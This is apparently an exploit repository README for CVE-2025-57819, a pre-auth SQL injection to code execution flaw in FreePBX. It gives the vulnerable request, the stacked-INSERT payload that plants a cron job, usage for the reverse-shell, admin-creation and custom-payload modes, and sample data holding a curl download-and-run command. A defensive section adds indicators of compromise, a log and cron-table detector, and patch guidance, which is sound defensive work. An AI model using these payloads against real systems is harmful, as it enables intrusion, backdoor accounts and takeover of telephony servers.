## https://sploitus.com/exploit?id=087C6F77-A5E1-5344-AD41-F986E6855C8A
# CVE-2025-57819: FreePBX Pre-Auth SQLi to RCE

An all-in-one exploit for **CVE-2025-57819**, an unauthenticated SQL injection in
FreePBX's endpoint module that leads to remote code execution via cron job injection.

- **CVSS**: 9.8 (Critical), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CISA KEV**: Added August 29, 2025
- **Affected**: Sangoma FreePBX 15, 16, 17 with the `endpoint` module installed

## Attack chain

```
Unauthenticated GET /admin/ajax.php (endpoint module, attacker-controlled `brand` parameter)
        │
        ▼
SQL injection into the `cron_jobs` table
(stacked INSERT with an attacker-controlled command, schedule="* * * * *")
        │
        ▼
Within ~60 seconds, the cron job fires and the command runs as the `asterisk` user
        │
        ▼
Remote code execution
```

## Exploit Capabilities

This exploit supports three modes:

### 1. Staged Reverse Shell (default)

1. Generates a `linux/x64/shell_reverse_tcp` binary via `msfvenom`
2. Starts an HTTP server to serve the binary
3. Starts a TCP listener for the shell
4. Injects a cron job via SQLi that downloads + executes the binary
5. When the cron fires, you get an interactive shell
6. Cleans up the injected cron job on exit

Usage (positional arguments: target URL, attacker host for the callback, reverse-shell port):

```
python3 cve_2025_57819_aio.py <target_url> <lhost> <lport>
```

**Example:**
```
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452
```

This uses port 4452 for the reverse shell and 4453 for the HTTP stage server.

### 2. Admin User Creation (`--create-user`)

Creates a new FreePBX administrator account via SQLi. No reverse shell, no
reachback, no binaries required.

```
python3 cve_2025_57819_aio.py http://freepbx.internal --create-user
```

### 3. Custom Payload (`--payload <path>`)

Use your own ELF binary instead of generating one with msfvenom.

```
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452 \
    --payload /path/to/custom_shell.elf
```

## Requirements

- Python 3.6+
- `requests` library (`pip install requests`)
- **For staged mode**: Metasploit (`msfvenom`) or a custom payload with `--payload`
- **For `--create-user` mode**: Nothing beyond Python + requests

## How it works

### SQL Injection vector

The vulnerable endpoint is:

```
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=XXX&model=XXX&brand=
```

The `brand` parameter is concatenated into a SQL INSERT without sanitization, and
the database connection executes stacked statements, so the exploit crafts the
injection as:

```sql
';INSERT INTO cron_jobs (modulename,jobname,command,...) VALUES ('X','Y','<command>',NULL,'* * * * *',30,1,1) --
```

The leading `'` closes the open string literal, the `;` terminates the original
statement so that a second INSERT can be stacked behind it, and the trailing `--`
comments out the remainder of the original query. The third value is the shell
command the cron job will run.

### Cron execution

FreePBX's job scheduler reads the `cron_jobs` table (in the `asterisk` database)
and is itself run every minute from the `asterisk` user's crontab. When the
inserted job's schedule (`* * * * *`) matches on the next pass, the command runs
as the `asterisk` system user, so the delay between injection and execution is
anywhere up to a minute plus the scheduler's own run time.

### Cleanup

After the session ends (or on timeout), the exploit sends a DELETE SQLi to remove
the injected cron job from `cron_jobs`.

## Indicators of Compromise

- Unexpected entries in `asterisk.cron_jobs` with random module/job names
- Outbound HTTP requests from the FreePBX server to external IPs on high ports
- Reverse shell connections from the `asterisk` user
- Random new admin accounts in `ampusers` (if `--create-user` mode)
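The first and last two indicators above can be checked mechanically. The following is an added example, not part of the exploit's repository, that does two of the checks on constructed data: it scans Apache combined-format access-log lines for requests to the endpoint module's ajax handler whose `brand` value carries SQL syntax, and it reviews rows pulled from `asterisk.cron_jobs` for unknown module names, every-minute schedules and fetch-and-execute commands. The log lines, the cron_jobs rows, the module allow-list and the reduced four-column row shape are all constructed for the example; in practice the rows come from `SELECT modulename, jobname, command, schedule FROM asterisk.cron_jobs`.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access-log lines: two injection attempts
# (an INSERT and the cleanup DELETE) from one source, plus one benign request
# to the same handler. Addresses and timestamps are invented.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [29/Aug/2025:10:41:02 +0000] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=XXX&model=XXX&brand=%27%3BINSERT+INTO+cron_jobs+%28modulename%2Cjobname%2Ccommand%29+VALUES+%28%27X%27%2C%27Y%27%2C%27id%27%29+-- HTTP/1.1" 200 14 "-" "python-requests/2.31"
10.0.0.5 - - [29/Aug/2025:10:42:10 +0000] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=t1&model=T46&brand=yealink HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Aug/2025:10:44:31 +0000] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=XXX&model=XXX&brand=%27%3BDELETE+FROM+cron_jobs+WHERE+modulename%3D%27X%27+-- HTTP/1.1" 200 14 "-" "python-requests/2.31"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
SQL_KEYWORD_RE = re.compile(r"\b(INSERT|DELETE|UPDATE|SELECT|UNION)\b", re.IGNORECASE)


def suspicious_endpoint_requests(log_text: str) -> list:
    """Return requests to the endpoint ajax handler whose brand value looks like SQL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != "/admin/ajax.php":
            continue
        query = parse_qs(url.query)          # percent-decodes and splits parameters
        module = query.get("module", [""])[0]
        brand = query.get("brand", [""])[0]
        if "endpoint" not in module.lower():
            continue
        # A phone brand name never carries a quote, a statement separator or SQL verbs.
        if "'" in brand or ";" in brand or SQL_KEYWORD_RE.search(brand):
            hits.append({"ip": m["ip"], "time": m["ts"], "brand": brand})
    return hits


# Constructed snapshot of asterisk.cron_jobs reduced to the columns inspected:
# two plausible product jobs and the kind of row the exploit leaves behind.
# Module names, job names and paths are invented for the example.
SAMPLE_CRON_JOBS = [
    ("framework", "nightly_cleanup", "php /var/lib/asterisk/bin/nightly_cleanup.php", "0 3 * * *"),
    ("kqzvhtwm", "ptnoefaj",
     "curl -s http://10.10.14.85:4453/s -o /tmp/s && chmod +x /tmp/s && /tmp/s", "* * * * *"),
    ("endpoint", "firmware_check", "php /var/lib/asterisk/bin/endpoint_firmware.php", "30 4 * * *"),
]
# Constructed allow-list; build yours from the modules actually installed on the box.
KNOWN_MODULES = {"framework", "core", "endpoint", "cronmanager"}

FETCH_EXEC_RE = re.compile(
    r"\b(curl|wget|nc|ncat|bash -i|base64 -d|python\d? -c)\b|/dev/tcp/|/tmp/")


def suspicious_cron_jobs(rows, known_modules) -> list:
    """Flag cron_jobs rows with an unknown module, an every-minute schedule,
    or a command that downloads and runs something."""
    flagged = []
    for modulename, jobname, command, schedule in rows:
        reasons = []
        if modulename not in known_modules:
            reasons.append("unknown module")
        if schedule == "* * * * *":
            reasons.append("every-minute schedule")
        if FETCH_EXEC_RE.search(command):
            reasons.append("fetch-and-execute command")
        if reasons:
            flagged.append({"modulename": modulename, "jobname": jobname,
                            "command": command, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in suspicious_endpoint_requests(SAMPLE_ACCESS_LOG):
        print("request:", hit)
    for job in suspicious_cron_jobs(SAMPLE_CRON_JOBS, KNOWN_MODULES):
        print("cron job:", job)
```

An every-minute schedule on its own is only a prompt to look; the combination with a module name that is not installed or a download-and-run command is what should page someone. Note that the exploit deletes its row on exit, so an empty `cron_jobs` table does not clear the host; the access log and any `asterisk`-owned files left in `/tmp` still carry the evidence, and accounts created by `--create-user` mode need the same comparison against the `ampusers` entries you expect.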

## Mitigation

Update the endpoint module to a patched version:
- **15**: >= 15.0.66
- **16**: >= 16.0.89
- **17**: >= 17.0.3

Until the module is updated, restrict access to the `/admin` interface to trusted
networks, as the FreePBX community advisory linked below recommends; the injection
is reachable without credentials, so an exposed admin interface is the whole attack
surface.

## References

- [NVD: CVE-2025-57819](https://nvd.nist.gov/vuln/detail/CVE-2025-57819)
- [GitHub Security Advisory: GHSA-m42g-xg4c-5f3h](https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h)
- [CISA Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-57819)
- [watchTowr Labs](https://labs.watchtowr.com/)
- [FreePBX Community Advisory](https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203)

## Disclaimer

This software is provided for educational and authorized security testing purposes
only. Unauthorized use against systems you do not own or have explicit permission
to test is illegal. The author is not responsible for any misuse.